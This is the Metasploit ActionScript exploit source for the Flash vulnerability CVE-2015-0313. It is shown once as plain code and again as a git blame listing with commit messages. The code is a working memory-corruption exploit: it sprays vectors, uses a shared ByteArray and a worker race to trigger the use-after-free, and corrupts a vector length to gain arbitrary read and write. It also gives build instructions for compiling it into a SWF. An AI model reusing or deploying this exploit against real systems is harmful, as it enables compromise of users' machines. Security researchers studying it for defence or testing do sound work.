metasploit-framework/external/source/exploits/CVE-2015-0313/Exploit.as

// Build how to:
// 1. Download the AIRSDK, and use its compiler.
// 2. Be support to support 16.0 as target-player (flex-config.xml).
// 3. Download the Flex SDK (4.6)
// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
// 5. Build with: mxmlc -o msf.swf Main.as

// Original code by @hdarwin89 // http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/
// Modified to be used from msf
package
{
import flash.display.Sprite
import flash.display.LoaderInfo
import flash.events.Event
import flash.utils.ByteArray
import flash.system.Worker
import flash.system.WorkerDomain
import flash.system.MessageChannel
import flash.system.ApplicationDomain
import avm2.intrinsics.memory.casi32
import mx.utils.Base64Decoder

public class Main extends Sprite
{
    private var ov:Vector.<Object> = new Vector.<Object>(80000)
    private var uv:Vector.<uint>
    private var ba:ByteArray = new ByteArray()
    private var worker:Worker
    private var mc:MessageChannel
    private var b64:Base64Decoder = new Base64Decoder()
    private var payload:String = ""

    public function Main()
    {
        if (Worker.current.isPrimordial) mainThread()
        else workerThread()
    }

    private function mainThread():void
    {
      //  var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
    //    var pattern:RegExp = / /g;
  //      b64_payload = b64_payload.replace(pattern, "+")
//        b64.decode(b64_payload)
//        payload = b64.toByteArray().toString()

        ba.length = 0x1000
        ba.shareable = true
        for (var i:uint = 0; i < ov.length; i++) {
            ov[i] = new Vector.<uint>(1014)
            ov[i][0] = 0xdeedbeef
        }
        for (i = 0; i < ov.length / 2; i += 2) {
			delete(ov[i])
		}
        worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
        mc = worker.createMessageChannel(Worker.current)
        mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage)
        worker.setSharedProperty("mc", mc)
        worker.setSharedProperty("ba", ba)
        ApplicationDomain.currentDomain.domainMemory = ba
		Logger.log("starting...")
        worker.start()
    }

    private function workerThread():void
    {
        var ba:ByteArray = Worker.current.getSharedProperty("ba")
        var mc:MessageChannel = Worker.current.getSharedProperty("mc")
        ba.clear()
        ov[0] = new Vector.<uint>(1022)
        mc.send("")
        while (mc.messageAvailable);
        for (var i:uint = 0; i < 20000; i++) {
        	if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) {
				ov[0][i] = 0xffffffff
				break
        	}
        }
		ov[0][0xfffffffe] = 1014
        mc.send("")
    }

    private function onMessage(e:Event):void
    {
		Logger.log("[*] onMessage")
        var mod:uint = casi32(0, 1022, 0xFFFFFFFF)
		Logger.log("[*] onMessage - mod: " + mod.toString())
        if (mod == 1022) mc.receive()
        else {
			Logger.log("[*] onMessage - Searching corrupted vector...")
	        for (var i:uint = 0; i < ov.length; i++) {
	            if (ov[i].length == 0xffffffff) {
					uv = ov[i]
				} else {
					ov[i] = null
				}
	        }
			if (uv == null) {
				Logger.log("not found")
				return
			}
			Logger.log('whooray: ' + uv.length.toString(16))
        }
    }
}
}
Add module for CVE-2015-0313 2015-03-27 23:51:13 +00:00			`// Build how to:`
			`// 1. Download the AIRSDK, and use its compiler.`
			`// 2. Be support to support 16.0 as target-player (flex-config.xml).`
			`// 3. Download the Flex SDK (4.6)`
			`// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)`
			`// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)`
			`// 5. Build with: mxmlc -o msf.swf Main.as`

			`// Original code by @hdarwin89 // http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/`
			`// Modified to be used from msf`
			`package`
			`{`
Do reliable resolution of kernel32 2015-03-29 20:52:13 +00:00			`import flash.display.Sprite`
			`import flash.display.LoaderInfo`
			`import flash.events.Event`
			`import flash.utils.ByteArray`
			`import flash.system.Worker`
			`import flash.system.WorkerDomain`
			`import flash.system.MessageChannel`
			`import flash.system.ApplicationDomain`
			`import avm2.intrinsics.memory.casi32`
			`import mx.utils.Base64Decoder`

			`public class Main extends Sprite`
			`{`
Update AS codE 2015-06-10 14:12:25 +00:00			`private var ov:Vector.<Object> = new Vector.<Object>(80000)`
			`private var uv:Vector.<uint>`
Do reliable resolution of kernel32 2015-03-29 20:52:13 +00:00			`private var ba:ByteArray = new ByteArray()`
			`private var worker:Worker`
			`private var mc:MessageChannel`
			`private var b64:Base64Decoder = new Base64Decoder()`
			`private var payload:String = ""`

			`public function Main()`
			`{`
			`if (Worker.current.isPrimordial) mainThread()`
			`else workerThread()`
			`}`

			`private function mainThread():void`
			`{`
Update AS codE 2015-06-10 14:12:25 +00:00			`// var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh`
			`// var pattern:RegExp = / /g;`
			`// b64_payload = b64_payload.replace(pattern, "+")`
			`// b64.decode(b64_payload)`
			`// payload = b64.toByteArray().toString()`
Do reliable resolution of kernel32 2015-03-29 20:52:13 +00:00
			`ba.length = 0x1000`
			`ba.shareable = true`
			`for (var i:uint = 0; i < ov.length; i++) {`
Update AS codE 2015-06-10 14:12:25 +00:00			`ov[i] = new Vector.<uint>(1014)`
			`ov[i][0] = 0xdeedbeef`
Do reliable resolution of kernel32 2015-03-29 20:52:13 +00:00			`}`
Update AS codE 2015-06-10 14:12:25 +00:00			`for (i = 0; i < ov.length / 2; i += 2) {`
			`delete(ov[i])`
			`}`
Do reliable resolution of kernel32 2015-03-29 20:52:13 +00:00			`worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)`
			`mc = worker.createMessageChannel(Worker.current)`
			`mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage)`
			`worker.setSharedProperty("mc", mc)`
			`worker.setSharedProperty("ba", ba)`
			`ApplicationDomain.currentDomain.domainMemory = ba`
Update AS codE 2015-06-10 14:12:25 +00:00			`Logger.log("starting...")`
Do reliable resolution of kernel32 2015-03-29 20:52:13 +00:00			`worker.start()`
			`}`

			`private function workerThread():void`
			`{`
			`var ba:ByteArray = Worker.current.getSharedProperty("ba")`
			`var mc:MessageChannel = Worker.current.getSharedProperty("mc")`
			`ba.clear()`
			`ov[0] = new Vector.<uint>(1022)`
			`mc.send("")`
			`while (mc.messageAvailable);`
Update AS codE 2015-06-10 14:12:25 +00:00			`for (var i:uint = 0; i < 20000; i++) {`
			`if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) {`
			`ov[0][i] = 0xffffffff`
			`break`
			`}`
			`}`
			`ov[0][0xfffffffe] = 1014`
			`mc.send("")`
Do reliable resolution of kernel32 2015-03-29 20:52:13 +00:00			`}`

			`private function onMessage(e:Event):void`
			`{`
Update AS codE 2015-06-10 14:12:25 +00:00			`Logger.log("[*] onMessage")`
			`var mod:uint = casi32(0, 1022, 0xFFFFFFFF)`
			`Logger.log("[*] onMessage - mod: " + mod.toString())`
			`if (mod == 1022) mc.receive()`
Do reliable resolution of kernel32 2015-03-29 20:52:13 +00:00			`else {`
Update AS codE 2015-06-10 14:12:25 +00:00			`Logger.log("[*] onMessage - Searching corrupted vector...")`
			`for (var i:uint = 0; i < ov.length; i++) {`
			`if (ov[i].length == 0xffffffff) {`
			`uv = ov[i]`
			`} else {`
			`ov[i] = null`
			`}`
			`}`
			`if (uv == null) {`
			`Logger.log("not found")`
			`return`
			`}`
			`Logger.log('whooray: ' + uv.length.toString(16))`
Do reliable resolution of kernel32 2015-03-29 20:52:13 +00:00			`}`
			`}`
Add module for CVE-2015-0313 2015-03-27 23:51:13 +00:00			`}`
Fix CVE-2015-0313 2015-05-26 21:11:44 +00:00			`}`